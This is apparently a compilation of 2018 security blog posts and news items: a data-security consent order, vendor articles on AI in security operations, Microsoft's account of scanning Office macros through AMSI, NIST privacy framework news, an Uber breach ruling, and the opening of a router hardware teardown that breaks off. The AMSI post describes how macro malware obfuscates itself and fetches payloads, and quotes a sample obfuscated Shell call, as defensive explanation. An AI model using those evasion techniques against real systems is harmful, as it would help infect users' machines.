  • the maintenance and implementation of encryption protocols for personal information stored on laptops or other portable devices or transmitted wirelessly;
  • the maintenance and implementation of policies that clearly define which users have authorization to access its computer network;
  • the maintenance of enforcement mechanisms to approve or disapprove access requests based on those policies; and
  • the maintenance of data security assessment tools, including vulnerability scans.

In addition to the above, DealerBuilt agreed to an $80,784 settlement amount, comprised of $49,420 in civil penalties and $31,364 in reimbursement of the Division’s attorneys’ fees, investigative costs and expert fees.

Read the consent order resolving the investigation.

Break out of malware myopia by focusing on the fundamentals

Organizations today suffer from malware myopia, a condition characterized by threat-centric security programs caused by the ease of imagining a takedown by malicious code. Malware myopia is a mental bug; a defect in reasoning that scrambles people’s judgment. If asked point-blank, few would say that malware is an existential threat. To be sure, it is vital to acknowledge that an attacker only has to be ‘right’ once, and given eye-catching headlines surrounding new forms of … More

The post Break out of malware myopia by focusing on the fundamentals appeared first on Help Net Security.

How to gain visibility with global IT asset inventory

In this podcast recorded at Black Hat USA 2018, Pablo Quiroga, Director of Product Management at Qualys, talks about how to gain unprecedented visibility with global IT asset inventory. Here’s a transcript of the podcast for your convenience. My name is Pablo Quiroga. I’m the Director of Product Management at Qualys, and today I’m going to be speaking about how to gain unprecedented visibility with global IT asset inventory. A complete visibility of your IT … More

The post How to gain visibility with global IT asset inventory appeared first on Help Net Security.

Data privacy automation: Unlock your most valuable asset

In years past, data privacy was the purview of the chief privacy officer. However, increasingly, CTOs are being tasked with operationalizing a data privacy solution for the company. That’s because data privacy is fundamentally a data issue, with privacy being an outcome of a comprehensive data protection strategy. In a world of exploding data, it’s impossible for privacy professionals using manual, survey-based approaches to stay on top of this ever-changing sea of information. Companies constantly … More

The post Data privacy automation: Unlock your most valuable asset appeared first on Help Net Security.

It’s Time to Adopt AI in Your Security Operations Center

Security analysts: We know you’re overworked, understaffed and overwhelmed, and we understand that it’s not your fault. It’s not humanly possible for you to keep up with the ever-expanding threat landscape, especially given how busy you are with the day-to-day tasks of running your security operations center (SOC). We want you to know you’re not alone.

The Cybersecurity Skills Gap Is Only Getting Worse

According to research performed by the Enterprise Strategy Group, almost 51 percent of organizations in 2018 reported a “problematic shortage” of cybersecurity skills. Cybersecurity job fatigue is real, and according to ESG, almost 38 percent of security professionals claimed that the skills shortage has led to burnout and staff attrition. If you’re waiting for your job to magically become easier, you may want to think again; the situation is only getting worse.

Sure, the cybersecurity skills shortage and an ever-expanding threat landscape are valid excuses, but they’re not going to pay the bills when — not if — a data breach occurs. The Ponemon Institute found that average total cost of a data breach rose from $3.62 to $3.86 million in 2018, an increase of 6.4 percent from 2017.

Shorter Dwell Times Means Lower Costs

According to Ponemon, organizations that identified a breach in less than 100 days saved more than $1 million as compared to those that exceeded 100 days. Similarly, organizations that contained a breach in less than 30 days saved over $1 million as compared to those that took more than 30 days to resolve.

Simple, right? Identify the breach quickly and contain it to save your organization money. However, doing this when you receive more than 1 million daily security alerts is a daunting task, even for the best analysts. For those of you who aren’t security analysts, imagine having to sort and filter through a million emails in your inbox each day to figure out which require action and which are junk.

As a result, 30 percent of respondents to an Imperva survey admitted to having ignored certain categories of alerts, while 4 percent turned off the alert notifications altogether. Additionally, 56 percent admitted to having ignored an alert based on past experiences dealing with false positives.

Why You Should Adopt AI in the Security Operations Center

So, how do you combat cybersecurity job fatigue? Your best bet is to partner with artificial intelligence (AI) to force-multiply your team’s efforts in the security operations center. Here’s how to do it:

  • Automate incident analysis. Don’t waste human capital on routine analysis. Instead, let AI automate your repetitive SOC tasks while your team focuses on mission-critical decisions, such as suspicious behavior from insider threats.
  • Augment human intelligence. Upgrade your SOC by using AI to automatically find commonalities across incidents using cognitive reasoning to provide actionable feedback with context to your analysts.
  • Respond rapidly to threats. Reduce dwell times with automated hunting for indicators and add pertinent information to act on escalations for remediation and/or blocking.

Register for the exclusive webinar, “5 Reasons AI Is the Pillar of the Next-Gen SOC,” to learn about the top five challenges plaguing today’s SOCs and how security leaders can free up their analysts by leveraging AI technologies to focus on crucial threats.

Register for the live webinar, “5 Reasons AI Is the Pillar of the Next-Gen SOC”

The post It’s Time to Adopt AI in Your Security Operations Center appeared first on Security Intelligence.

Office VBA + AMSI: Parting the veil on malicious macros

As part of our continued efforts to tackle entire classes of threats, Office 365 client applications now integrate with Antimalware Scan Interface (AMSI), enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior.

Macro-based threats have always been a prevalent entry point for malware, but we have observed a resurgence in recent years. Continuous improvements in platform and application security have led to the decline of software exploits, and attackers have found a viable alternative infection vector in social engineering attacks that abuse functionalities like VBA macros. Microsoft, along with the rest of the industry, observed attackers transition from exploits to using malicious macros to infect endpoints. Malicious macros have since showed up in commodity malware campaigns, targeted attacks, and in red-team activities.

Figure 1. Prevalence of the exploit vs macro attack vector observed via Windows Defender ATP telemetry

To counter this threat, we invested in building better detection mechanisms that expose macro behavior through runtime instrumentation within our threat protection solutions in the cloud. Were bringing this instrumentation directly into Office 365 client applications. More importantly, were exposing this capability through AMSI, an open interface, making it accessible to any antivirus solution.

Obfuscation and other forms of detection evasion

Macros are popular among attackers because of the rich capabilities that the VBA runtime exposes and the privileged context in which macros execute. Notably, as with all scripting languages, attackers have another advantage: they can hide malicious code through obfuscation.

To evade detection, malware needs to hide intent. The most common way that attackers do this is through code obfuscation. Macro source codes are easy to obfuscate, and a plethora of free tools are available for attackers to automatically do this. This results in polymorphic malware, with evolving obfuscation patterns and multiple obfuscated variants of the same malicious macro.

Theres more: malicious code can be taken out of the macro source and hidden in other document components like text labels, forms, Excel cells, and others. Or why hide at all? A small piece of malicious code can be embedded somewhere in a huge legitimate source and keep a low profile.

How can antivirus and other security solutions cope? Today, antivirus solutions can extract and scan the obfuscated macro source code from an Office document. How can the macros intent be exposed? What if security solutions can observe a macros behavior at runtime and gain visibility into system interactions? Enter Office and AMSI integration.

AMSI on Windows 10

If AMSI rings a bell, its because we talked about how PowerShell adopted AMSI in a blog post when AMSI was introduced back in 2015.

Antimalware Scan Interface (AMSI) is an open interface available on Windows 10 for applications to request, at runtime, a synchronous scan of a memory buffer by an installed antivirus or security solution. Any application can interface with AMSI and request a scan for any data that may be untrusted or suspicious.

Any antivirus can become an AMSI provider and inspect data sent by applications via the AMSI interface. If the content submitted for scan is detected as malicious, the requesting application can take action to deal with the threat and ensure the safety of the device. To learn more, refer to the AMSI documentation.

AMSI also integrates with the JavaScript, VBScript, and PowerShell scripting engines. Over the years, we have been steadily increasing our investments in providing security solutions with deeper visibility into script-based threats. Insights seen via AMSI is consumed by our own security products. The new Office and AMSI integration is yet another addition to the arsenal of protection against script-based malware. Windows Defender Advanced Threat Protection (Windows Defender ATP) leverages AMSI and machine learning to combat script-based threats that live off the land (read our previous blog post to learn more).

Office VBA integration with AMSI

The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection.

Figure 2. Runtime scanning of macros via AMSI

Logging macro behavior

The VBA language offers macros a rich set of functions that can be used to interface with the operating system to run commands, access the file system, etc. Additionally, it allows the ability to issue direct calls to COM methods and Win32 APIs. The VBA scripting engine handles calls from macro code to COM and APIs via internal interfaces that implement the transition between the caller and the callee. These interfaces are instrumented such that the behavior of a macro is trapped and all relevant information, including the function name and its parameters, are logged in a circular buffer.

This monitoring is not tied to specific functions; its generic and works on any COM method or Win32 API. The logged calls can come in two formats:

  • <COM_Object>.<COM_Method>(Parameter 1, , Parameter n);
  • <API_or_function_Name>(Parameter 1, , Parameter n);

Invoked functions, methods, and APIs need to receive the parameters in the clear (plaintext) in order to work; thus, this behavioral instrumentation is not affected by obfuscation. This instrumentation thus reveals a weak spot for macro codes; the antivirus now has visibility on relevant activity of the macro in the clear.

To illustrate, consider the following string obfuscation in a shell command:

Shell(ma+l+ wa+ r + e.e + xe)

With the Office VBA and AMSI integration, this is logged like so:

Shell(malware.exe);

Triggering on suspicious behavior

When a potentially high-risk function or method (a trigger; for example, CreateProcess or ShellExecute) is invoked, Office halts the execution of the macro and requests a scan of the macro behavior logged up to that moment, via the AMSI interface. The AMSI provider (e.g., antivirus software) is invoked synchronously and returns a verdict indicating whether or not the observed behavior is malicious.

The list of high-risk functions or triggers are meant to cover actions at various stages of an attack chain (e.g., payload download, persistence, execution, etc.) and are selected based on their prevalence among malicious and benign macros. The behavior log sent over AMSI can include information like suspicious URLs from which malicious data was downloaded, suspicious file names known to be associated with malware, and others. This data is valuable in determining if the macro is malicious, as well as in the creation of detection indicators all without any influence from obfuscation.

Stopping malicious macros upon detection

If behavior is assessed malicious, macro execution is stopped. The user is notified by the Office application, and the application session is shut down to avoid any further damage. This can stop an attack in its tracks, protecting the device and user.

Figure 3. Malicious macro notification

Case study 1: Heavily obfuscated macro code

(SHA-256: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd)

To illustrate how the Office VBA and AMSI integration can expose malicious macro code, lets look at a recent social engineering attack that uses macro-based malware. The initial vector is a Word document with instructions in the Chinese language to Enable content.

Figure 4: The malicious document instructs to enable the content

If the recipient falls for the lure and enables content, the malicious macro code runs and launches a command to download the payload from a command-and-control server controlled by the attacker. The payload, an installer file, is then run.

The macro code is heavily obfuscated:

Figure 5: Obfuscated macro

However, behavior monitoring is not hindered by obfuscation. It produces the following log, which it passes to AMSI for scanning by antivirus:

Figure 6: De-obfuscated behavior log

The action carried out by the macro code is logged, clearly exposing malicious actions that antivirus solutions can detect much more easily than if the code was obfuscated.

Case study 2: Macro threat that lives off the land

(SHA-256: 7952a9da1001be95eb63bc39647bacc66ab7029d8ee0b71ede62ac44973abf79)

The following is an example of macro malware that lives off the land, which means that it stays away from the disk and uses common tools to run code directly in memory. In this case, it uses shellcode and dynamic pages. Like the previous example, this attack uses social engineering to get users to click Enable Content and run the macro code, but this one uses instructions in the Spanish language in Excel.

Figure 7. Malicious Excel file with instructions to enable content

When run, the macro code dynamically allocates virtual memory, writes shellcode to the allocated location, and uses a system callback to transfer execution control. The malicious shellcode then achieves fileless persistence, being memory-resident without a file.

Figure 8. Macro code utilizing Win32 APIs to launch embedded shellcode

When the shellcode gets execution control, it launches a PowerShell command to download additional payload from a command-and-control server controlled by the attacker.

Figure 9. PowerShell command that downloads payload

Even if the macro code uses fileless code execution technique using shellcode, its behavior is exposed to antivirus solutions via the AMSI interface. Sample log is shown below:

Figure 10. De-obfuscated behavior log

With the AMSI scan integration in both Office VBA and PowerShell, security solutions like Windows Defender ATP can gain clear visibility into malicious behavior at multiple levels and successfully block attacks.

Windows Defender ATP: Force multiplier and protection for down-level platforms

In addition to protecting users running Office 365 applications on Windows 10, detections via AMSI allow modern endpoint protection platforms like Windows Defender ATP to extend protection to customers via the cloud.

Figure 11. Simplified diagram showing how AMSI detections in a few machines are extended to other customers via the cloud

In Windows Defender AVs cloud-delivered antivirus protection, the Office VBA and AMSI integration enriches the signals sent to the cloud, where multiple layers of machine learning models classify and make verdicts on files. When devices encounter documents with suspicious macro code, Windows Defender AV sends metadata and other machine learning features, coupled with signals from Office AMSI, to the cloud. Verdicts by machine learning translate to real-time protection for the rest of Windows Defender AV customers with cloud protection enabled.

This protection is also delivered to the rest of Microsoft 365 customers. Through the Microsoft Intelligent Security Graph, security signals are shared across components of Microsoft 365 threat protection. For example, in the case of macro malware, detections of malicious macro-laced documents by Windows Defender AV are shared with Office 365 ATP, which blocks emails carrying the document, stopping attacks before the documents land in users mailboxes.

Figure 12. The Office and AMSI integration enriches the orchestration of protection across Microsoft 365

Within a few weeks after the release of this new instrumentation in Office VBA and the adoption by Windows Defender ATP, we saw this multiplier effect, with signals from a few hundred devices protecting several tens of thousands of devices. Because Office AMSI feature exposes behaviors of the macro irrespective of content, language, or obfuscation, signals from one part of the world can translate to protection for the rest of the globe this is powerful.

Availability

AMSI integration is now available and turned on by default on the Monthly Channel for Office 365 client applications including Word, Excel, PowerPoint, Access, Visio, and Publisher.

In its default configuration, macros are scanned at runtime via AMSI except in the following scenarios:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from trusted locations
  • Documents that are trusted documents
  • Documents that contain VBA that is digitally signed by a trusted publisher

Office 365 applications also expose a new policy control for administrators to configure if and when macros are scanned at runtime via AMSI:

Group Policy setting name Macro Runtime Scan Scope
Path User Configuration > Administrative templates > Microsoft Office 2016 > Security Settings
Description

This policy setting specifies for which documents the VBA Runtime Scan feature is enabled.

Disable for all documents: If the feature is disabled for all documents, no runtime scanning of enabled macros will be performed.

Enable for low trust documents: If the feature is enabled for low trust documents, the feature will be enabled for all documents for which macros are enabled except:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from a Trusted Location
  • Documents that are Trusted Documents
  • Documents that contain VBA that is digitally signed by a Trusted Publisher

Enable for all documents: If the feature is enabled for all documents, then the above class of documents are not excluded from the behavior.

This protocol allows the VBA runtime to report to the Anti-Virus system certain high-risk code behaviors it is about to execute and allows the Anti-Virus to report back to the process if the sequence of observed behaviors indicates likely malicious activity so the Office application can take appropriate action.

When this feature is enabled, affected VBA projects’ runtime performance may be reduced.

Conclusion: Exposing hidden malicious intent

Macro-based malware continuously evolves and poses challenges in detection using techniques like sandbox evasion and code obfuscation. Antimalware Scan Interface (AMSI)s integration with Office 365 applications enable runtime scanning of macros, exposing malicious intent even with heavy obfuscation. This latest improvement to Office 365 allows modern endpoint security platforms like Windows Defender ATP to defeat macro-based threats.

Code instrumentation and runtime monitoring are powerful tools for threat protection. Combined with runtime scanning via AMSI, they enable antivirus and other security solutions to have greater visibility into the runtime behavior of a macro execution session at a very granular level, while also bypassing code obfuscation. This enables antivirus solutions to (1) detect a wide range of mutated or obfuscated malware that exhibit the same behavior using a smaller but more efficient set of detection algorithms, and (2) impose more granular restrictions on what macros are allowed to do at runtime.

Moreover, AMSI protection is not limited to macros. Other scripting engines like JavaScript, VBScript, and PowerShell also implement a form of code instrumentation and interface with AMSI. Attacks with multiple stages that use different scripts will be under scrutiny by AMSI at each step, exposing all behaviors and enabling detection by antivirus and other solutions.

We believe this is another step forward in elevating security for Microsoft 365 customers. More importantly, AMSI and Office 365 integration enables the broader ecosystem of security solutions to better detect and protect customers from malicious attacks without disrupting day-to-day productivity.

 

 

Giulia Biagini, Microsoft Threat Intelligence Center
Sriram Iyer, Office Security
Karthik Selvaraj, Windows Defender ATP Research

 

 

 

 

The post Office VBA + AMSI: Parting the veil on malicious macros appeared first on Microsoft Secure.

Taking Stock: The Internet of Things, and Machine Learning Algorithms at War

It’s in the news every day; hackers targeting banks, hospitals, or, as we’ve come to fear the most, elections.

Suffice to say then that cybersecurity has, in the last few years, gone from a relatively obscure industry – let’s qualify that: not in the sense of importance, but rather how folks have been interacting with it – to one at the forefront of global efforts to protect our data and applications.

 A decade ago, cybersecurity researchers were almost as caliginous as the hackers they were trying to defend folks against, and despite the lack of fanfare, some people still chose it as a career (*gasp).

We spoke to one of our whizz-kids, Gilad Yehudai, to find out what makes him tick and why, of all the possible fields in tech, he chose cybersecurity at a time when it might not have been the sexiest of industries.

Protecting data and applications, a different beast altogether

One of the major challenges facing the industry is the ability to attract new talent; especially when competing against companies that occupy the public sphere from the moment our alarm wakes us up to the moment we lay our phones to rest. Gilad, who has a master’s degree in mathematics and forms part of our team in Israel, offers a pretty interesting perspective,

“The world of cybersecurity is a fascinating one from my point of view, especially when trying to solve machine learning problems related to it. Cybersecurity is adversarial in nature, where hackers try to understand security mechanisms and how to bypass them. Developing algorithms in such environments is much more challenging than algorithms where the data doesn’t try to fool you.”

Never a dull moment

Additionally, our industry is one in flux, as more threats and vulnerabilities are introduced, and hackers find new ways to bypass security mechanisms. The latter was a pretty big draw for Gilad, whose experience in mathematics and serving in the Israeli Army’s cyber defense department made him a great candidate for the Imperva threat research team.

“The research group at Imperva seemed like the perfect fit, as large parts of my day to day job is to develop machine learning algorithms in the domain of cybersecurity, and the data I use is mostly attacks on web applications.”

Speaking of attacks, Gilad and the rest of our research team sure have their hands full.

“In my opinion, the Internet of Things (IoT) security is one of the biggest challenges out there. More and more devices are connected to the internet every day and these devices may be put to malicious use. Hackers may enlist these devices to their botnet in order to launch attacks like DDoS, ATO (account takeover), comment spam and much more.”

Worse still, our growing network of ‘micro-computers’ (smartphones, tablets etc.) could be manipulated and their computational power used to mine cryptocurrencies.

“Protecting these devices the same way we protect endpoint PCs will be one of the biggest challenges.”

Change brings new challenges, and opportunities

On the topic of change, the cybersecurity industry, according to Gilad, is headed increasingly towards machine learning and automation; which serves us well.

“If in the past most security mechanisms were based on hard-coded rules written by security experts, today more and more products are based on rules that are created automatically using artificial intelligent algorithms. These mechanisms can be much more dynamic and adapt better to the ever-changing world of cybersecurity.”

That said, the more the industry relies on machine learning algorithms for defense, the higher the likelihood that hackers will look to manipulate those same algorithms for their own purposes.

“Hackers may try to create adversarial examples to fool machine learning algorithms. Securing algorithms will require more effort, effort that will intensify as these algorithms are used in more sensitive processes. For example, facial recognition algorithms that authorize access to a specific location may be fooled by hackers using an adversarial example in order to gain access to an unauthorized location.”

While the cyber threat landscape continues to evolve, and the bad actors looking to nick our data and compromise our applications get increasingly creative, it’s good to know that there are experts whose sole purpose it is to ‘fight the good fight’, so to speak.

“Research is a bit like walking in the dark, you don’t know in which direction to go next, and you never know what you are going find. Sometimes you begin to research in some direction, and in the process you find a completely other direction which you haven’t even though about at the beginning. Research is not for everybody, but I get really excited about it.

NIST Launches Privacy Framework Effort

On September 4, 2018, the Department of Commerce’s National Institute of Standards and Technology (“NIST”) announced a collaborative project to develop a voluntary privacy framework to help organizations manage privacy risk. The announcement states that the effort is motivated by innovative new technologies, such as the Internet of Things and artificial intelligence, as well as the increasing complexity of network environments and detail of user data, which make protecting individuals’ privacy more difficult. “We’ve had great success with broad adoption of the NIST Cybersecurity Framework, and we see this as providing complementary guidance for managing privacy risk,” said Under Secretary of Commerce for Standards and Technology and NIST Director Walter G. Copan.

The goals for the framework stated in the announcement include providing an enterprise-level approach that helps organizations prioritize strategies for flexible and effective privacy protection solutions and bridge gaps between privacy professionals and senior executives so that organizations can respond effectively to these challenges without stifling innovation. To kick off the effort, the NIST has scheduled a public workshop on October 16, 2018, in Austin, Texas, which will occur in conjunction with the International Association of Privacy Professionals’ “Privacy. Security. Risk. 2018” conference. The Austin workshop is the first in a series planned to collect current practices, challenges and requirements in managing privacy risks in ways that go beyond common cybersecurity practices.

In parallel with the NIST’s efforts, the Department of Commerce’s National Telecommunications and Information Administration (“NTIA”) is “developing a domestic legal and policy approach for consumer privacy.” The announcement stated that the NTIA is coordinating its efforts with the department’s International Trade Administration “to ensure consistency with international policy objectives.”

Legal AI: How Machine Learning Is Aiding — and Concerning — Law Practitioners

Law firms tasked with analyzing mounds of data and interpreting dense legal texts can vastly improve their efficiency by training artificial intelligence (AI) tools to complete this processing for them. While AI is making headlines in a wide range of industries, legal AI may not come to mind for many. But the technology, which is already prevalent in the manufacturing, cybersecurity, retail and healthcare sectors, is quickly becoming a must-have tool in the legal industry.

Due to the sheer volume of sensitive data belonging to both clients and firms themselves, legal organizations are in a prickly position when it comes to their responsibility to uphold data privacy. Legal professionals are still learning what the privacy threats are and how they intersect with data security regulations. For this reason, it’s critical to understand security best practices for operations involving AI.

Before tackling the cybersecurity implications, let’s explore some reasons why the legal industry is such a compelling use case for AI.

How Do Legal Organizations Use AI?

If you run a law firm, imagine how much more efficient you could be if you could train your software to recognize and predict patterns that not only improve client engagement, but also streamline the workflow of your legal team. Or what if that software could learn to delegate tasks to itself?

With some AI applications already on the market, this is only the beginning of what the technology can do. For example, contract analysis automation solutions can read contracts in seconds, highlight key information visually with easy-to-read graphs and charts, and get “smarter” with each contract reviewed. Other tools use AI to scan legal documents, case files and decisions to predict how courts will rule in tax decisions.

In fact, the use of AI in the legal industry has been around for years, according to Sherry Askin, CEO of Omni Software Systems. Askin has deep roots in the AI field, including work with IBM’s Watson.

“AI is all about increasing efficiency, and is being touted as the next revolution,” she said. “We’ve squeezed as much as we can from human productivity through automation. The next plateau from productivity and the next threshold is AI.”

Why Machine Learning Is Critical

Law is all about words, natural language and the coded version of an unstructured version, said Askin. While we know how to handle the coded versions, she explained, the challenge with legal AI is that outputs are so tightly tailored to past results described by their inputs. That’s where machine learning comes in to predict how these inputs might change.

Askin compared machine learning to the process of intellectual development by which children soak up news words, paragraphs, long arguments, vocabulary and, most importantly, context. With deep learning, not only are you inputting data, but you’re giving the machine context and relevance.

“The machine is no longer a vessel of information,” Askin explained. “It figures out what to do with that information and it can predict things for you.”

Although machines can’t make decisions the same way that humans can, the more the neural processing and training they conduct, the more sophisticated their learning and deliverables can become. Some legal AI tools can process and analyze thousands of lease agreements, doing in seconds what humans would do in weeks.

How Do Privacy Regulations Impact Legal Firms?

For any industry, protecting privileged client data is a paramount concern. The American Bar Association, which requires practitioners to employ reasonable efforts to prevent unauthorized access to client data, has implemented periodic changes and updates to address the advances of technology. In addition, the Legal Cloud Computing Association (LCCA) issued 21 standards to assist law firms and attorneys in addressing these needs, including testing, limitations on third-party access, data retention policy, encryption, end user authentication and modifications to data.

Askin urged legal organizations to evaluate strategies impacting security and privacy in the context of what they modify or replace.

“I believe this is a major factor in legal because the profession has a deep legacy of expert-led art,” she said. “Traditional IT automation solutions perform best with systematized process and structured data. Unfortunately, systematization and structure are not historically compatible with the practice of law or any other professional disciplines that rely on human intelligence and dynamic reasoning.”

How to Keep Legal AI Tools in the Right Hands

Legal organizations are tempting targets for malicious actors because they handle troves of sensitive and confidential information. Rod Soto, director of security research for Jask, recommended several key strategies: employ defense in depth principles at the infrastructure level, train personnel in security awareness and use AI to significantly enhance security posture overall. To protect automated operations conducted by AI, Soto warned, we must understand that while these AI systems are trained to be effective, they can also be steered off course.

“Malicious actors can and will approach AI learning models and will attempt to mistrain them, hence the importance of feedback loops and sanity checks from experienced analysts,” he said. “You cannot trust AI blindly.”

Finally, it’s crucial for legal organizations to understand that AI does not replace a trained analyst.

“AI is there to help the analyst in things that humans have limitations, such as processing very large amounts of alarms or going through thousands of events in a timely manner,” said Soto. “Ultimately, it is upon the trained analyst to make the call. An analyst should always exercise judgment based on his experience when using AI systems.”

Because the pressure to transform is industrywide, profound changes are taking shape to help security experts consistently identify the weakest link in the security chain: people.

“It’s nearly impossible to control all data and privacy risks where decentralized data and human-managed processes are prevalent,” Askin said. “The greater the number of endpoints, the higher the risk of breach. This is where the nature of AI can precipitate a reduction in security and privacy vulnerabilities, particularly where prior IT adoption or data protection practices were limited.”

The post Legal AI: How Machine Learning Is Aiding — and Concerning — Law Practitioners appeared first on Security Intelligence.

Uber Data Breach Class Action Must Proceed to Arbitration

On September 5, 2018, the U.S. District Court for the Central District of California held that a class action arising from a 2016 Uber Technologies Inc. (“Uber”) data breach must proceed to arbitration. The case was initially filed after a 2016 data breach that affected approximately 600,000 Uber drivers and 57 million Uber customers. Upon registration with Uber, the drivers and customers entered into a service agreement that contained an arbitration provision. Based on this provision, the defendants moved to compel arbitration. They argued that the provision’s express language delegated the threshold issue of whether the case should be arbitrated (also called an issue of “substantive arbitrability”) to an arbitrator, not to the court. The plaintiffs countered, arguing that the arbitration clause was both inapplicable to the 2016 data breach and unconscionable, and that Uber customers did not receive reasonable notice of the electronic terms agreement when they registered.

The court rejected each of the plaintiffs’ arguments. First, citing Mohammed v. Uber Techs., Inc., 848 F.3d 1201, 1209 (9th Cir. 2016), the court held that the agreement’s language “clearly and unmistakably” delegated to the arbitrator the threshold and substantive issue of whether the 2016 breach was one that should be arbitrated. Second, whether the arbitration provision was unconscionable was similarly a question of substantive arbitrability “expressly delegated to the arbitrator.” Third, the court noted that the plaintiffs offered no evidence of confusion or lack of notice, and that many other courts had found similar electronic notice to be reasonable.

The case has been stayed pending completion of the arbitration.

How Can Media Companies Be More Confident in Their Cybersecurity Strategy and Policy?

While many industries have matured their cybersecurity strategy and policy as the digital landscape has evolved, others — such as media companies — remain unsure how to advance.

With more consumers relying on the internet for their entertainment and information consumption, media enterprises are tasked with providing a flawless user experience and continuous content delivery. But the industry is prey to a growing number of predators. As a result, a recent Akamai study titled “The State of Media Security” found that only 1 percent of media companies are “very confident” with their cybersecurity efforts.

What Challenges Do Media Companies Face?

The threat of a distributed denial-of-service (DDoS) attack, which could slow services or result in downtime, is only one of the many security challenges media companies face. Also of concern is the potential for malicious actors to steal content or breach systems and access customer networks.

“It’s not surprising that media companies aren’t confident about their security levels,” said Elad Shapira, head of research at Panorays. “They are an ongoing target, whether by political activists or nation states … Then there are those hackers just trying to leverage their skills to make money from the content they steal.”

SQL injections, Domain Name System (DNS) attacks, content pirating and DDoS attacks are among the greatest threats to the media industry. The dynamic nature of the digital ecosystem, where digital partners can change by the day, enables bad actors to optimize the reach of their malicious campaigns.

“Media organizations in particular should be afraid of their heavily trafficked digital assets, which not only serve as touch points to prospects and customers, but also provide entry points to bad actors,” said Chris Olson, CEO of The Media Trust. “These miscreants often target third-party code providers and digital advertising partners, who tend to have weaker security measures in place.”

In the past, security discussions at media companies focused largely on piracy, said Shane Keats, director of global industry strategy, media and entertainment at Akamai. It’s now incumbent upon media companies to recognize that security has extended far beyond digital rights management.

Why Do Cybercriminals Target Media Companies?

Cybercriminals rarely discriminate when it comes to their targets — which means that in the eyes of a criminal, media companies look an awful lot like retailers and banks.

“With the rise of subscription-based monetization, media companies are now increasingly capturing personally identifiable information (PII) and payment card information (PCI) that [looks] no different from the PII and PCI captured by an e-commerce company,” said Keats. “Successfully stealing a streaming video on demand (SVOD) customer database with a million customer records yields the same ROI as one stolen from an online retailer.”

Whether protecting against credentials-stuffing from malicious bots or careless contractors in the vendor landscape, media companies need to practice good security hygiene and be wary of the security practices of partners who have access to their customers’ networks. As has been the case in so many major breaches, all an attacker has to do is compromise one of those partners to gain access to the firewall and steal content, customer data and executive communications.

How Can Medial Companies Improve Cybersecurity Strategy and Policy?

In addition to acquiring a reputable cloud security firm to help investigate the attack surfaces exposing their businesses, media companies also need to ensure that they have solutions to protect each of those points.

“Find a firm that has enough scale to be able to see a ton of threats, both traditional and emerging, and ask the firm to help you understand how to best secure your apps and architecture beyond buzzwords,” Keats advised. “When you do this information session, get your different stakeholders in the room so that you can look at your security posture as a team. This is not the time for turf wars.”

By taking the following steps, media companies can enhance their security strategy and feel more confident that they are protected against current and emerging threats:

  • Discover and prioritize impacts of assets. Not all assets are created equal. An online release of a video prior to its debut screening may create reputational and financial damage to a company, but the credit card details of subscribers are under regulatory control. Each company needs to consider its assets and how they impact the business.

  • Collaborate with direct and indirect third parties. Websites have an average of 140 third parties who execute anywhere from 50 to 95 percent of their code. Most website owners only know, at most, half of the third parties with whom they do business.

  • Vet third parties. Media companies should ask their third and downstream parties the hard questions about security and follow up with frequent audits of security measures. Companies should enforce their digital policies through service-level agreements (SLAs) and contract clauses.

  • Place safety measures around these assets. Safety measures should span various levels, including networks and IT to prevent a DDoS attack, as well as on applications to avoid account breaches. Consider the human element to prevent disgruntled employees from exposing sensitive and proprietary data. Media companies should continuously scan assets in real time to identify and terminate any threats.

  • Create an incident response plan. This is not just a technological approach, but a step that must involve various teams and processes. In case of an attack against the company, there should be an advanced, detailed and well-rehearsed plan to respond.

A data breach poses a significant financial and reputational risk to media companies. To avoid becoming the next headline, businesses need to thoroughly understand not only their own risks, but also the risks that their suppliers pose.

Once media companies understand those risks, they can take measures to continuously protect against emerging threats. Collaboration throughout the organization, as well as with extended partners, will help to enforce strong digital policies and remediate unauthorized activities within the digital ecosystem.

The post How Can Media Companies Be More Confident in Their Cybersecurity Strategy and Policy? appeared first on Security Intelligence.

Assessing the security of a portable router: a look inside its hardware

Network administrators should perform security assessments of hardware that they will provide their users, or particularly paranoid users might want to poke at their devices just to be extra sure.

In this blog post, we will demonstrate the techniques used to assess security on a generic portable router purchased online. We have redacted its identifiable information as our goal here isn’t to provide a free penetration test to the hardware manufacturer. (Someone enterprising enough could still figure this out.)

Can we actually trust this device? This was an inexpensive router, and probably assembled with off-the-shelf components.

In order to assess how secure this device really is, we are going to have to take it apart and figure out what makes it tick.

The packaging

The router came in a small box covered in helpful information about its capabilities, with the only brand attribution being a silver sticker with [REDACTED] written on it.

 

It looks like a device made by a third party and re-branded to quickly bolster the product offerings of another company. A quick Google search did not yield a website for this product on the first page of results, but more digging did reveal a manufacturer that we will not disclose here.

Perusing their product line, we were able to find the router we had purchased. We located a firmware update and downloaded it for further investigation. More on this later.

Gathering equipment

Once we received the router, the first thing we did was disassemble it. The best tool to do this is the ifixit tool kit.

This is the gold standard for disassembling stuff. It comes with many of the esoteric fastener heads devised to frustrate anyone trying to take things apart.

This mini router had no visible screws—this is a trend for many devices as of late. Disassembly required the use of the “spudge tool” from the ifixit toolkit, and we gently pried the cover off. Thankfully, there weren’t any of the warranty “void if tampered” stickers. These are illegal.

Taking the router apart revealed the main router board with two antennae and one chip in the center. The main chip in the center was an MIPS processor, and there’s a specific model number silk screened onto the mainboard.

Some light Googling revealed that this chipset has a manufacturer website and even a product-specific page.

I also found a WikiDevi page on our exact model. WikiDevi is a user-editable database for computer hardware based on MediaWiki and Semantic MediaWiki. This page contains a ton of good info on the chipset, its capabilities, where it is sold, and by who.

Let’s file those tidbits of information away for now. We’ll come back to them later.

The board has four unpopulated pin holes. These are typically called either “plated-through holes” or “annular rings.” We will just refer to them as plated-through holes for this exercise.

This looks suspiciously like an interface that the manufacturer left on the mainboard. These plated-through holes are usually used to flash the operating system onto the board and test the unit at the factory to verify everything is working properly. There’s no attempt made to hide its purpose.

After some light digging on the product website, we did find mention of the slow I/O features of this chipset.

Further, Googling showed that this pinout is fairly common and might be of the UART variety.

There’s mention of UART on the [REDACTED] product page. This looks promising, like a good place to start. But the plated-through holes are in an awkward position, and examining the mainboard is difficult.

More equipment

